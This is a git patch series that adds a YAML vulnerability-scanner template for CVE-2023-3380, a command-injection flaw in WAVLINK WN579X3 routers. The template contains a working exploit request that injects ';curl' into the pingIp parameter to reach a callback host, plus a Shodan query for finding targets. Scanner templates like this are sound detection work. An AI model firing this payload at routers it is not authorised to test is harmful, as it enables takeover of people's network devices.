From c92efd11f524d68d05d1217d613ad38b7e26eeb9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 May 2024 16:53:38 +0530 Subject: [PATCH 1/4] Create CVE-2023-3380.yaml --- http/cves/2023/CVE-2023-3380.yaml | 60 +++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3380.yaml diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml new file mode 100644 index 0000000000..6d59b87411 --- /dev/null +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -0,0 +1,60 @@ +id: CVE-2023-3380 + +info: + name: WAVLINK WN579X3 - Remote Command Execution + author: pussycat0x + severity: critical + description: | + Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi. + reference: + - https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md + - https://vuldb.com/?ctiid.232236 + - https://vuldb.com/?id.232236 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3380 + cwe-id: CWE-74 + epss-score: 0.00064 + epss-percentile: 0.26519 + cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:* + metadata: + vendor: wavlink + product: wn579x3_firmware + shodan-query: http.html:"Wavlink" + tags: cve,cve2023,wavlink + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "images/WAVLINK-logo.png" + - "Wi-Fi APP Login" + condition: and + + - raw: + - | + POST /cgi-bin/adm.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ping.shtml?r=32723 + + page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 200 From 06c7275753d19d0f2302f03190f3c2cbc6a0b925 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 May 2024 22:07:10 +0530 Subject: [PATCH 2/4] lint -fix --- http/cves/2023/CVE-2023-3380.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index 6d59b87411..e78e68b920 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -22,7 +22,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" - tags: cve,cve2023,wavlink + tags: cve,cve2023,wavlink flow: http(1) && http(2) @@ -46,7 +46,7 @@ http: Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/ping.shtml?r=32723 - page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} + page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}} matchers-condition: and matchers: From 63b01a5682ea46d9c7d9fa8356c87caf8316579a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 25 Jun 2024 13:14:59 +0530 Subject: [PATCH 3/4] added internal: true --- http/cves/2023/CVE-2023-3380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index e78e68b920..b0d6fbb189 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -37,6 +37,7 @@ http: - "images/WAVLINK-logo.png" - "Wi-Fi APP Login" condition: and + internal: true - raw: - | From 73694e1f11528440913e7351cdd76b9899390ca5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 16:03:07 +0530 Subject: [PATCH 4/4] Update CVE-2023-3380.yaml --- http/cves/2023/CVE-2023-3380.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index b0d6fbb189..506f1a8eb0 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -22,7 +22,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" - tags: cve,cve2023,wavlink + tags: cve,cve2023,wavlink,rce flow: http(1) && http(2) @@ -45,7 +45,7 @@ http: Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ping.shtml?r=32723 + Referer: {{RootURL}}/ping.shtml page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}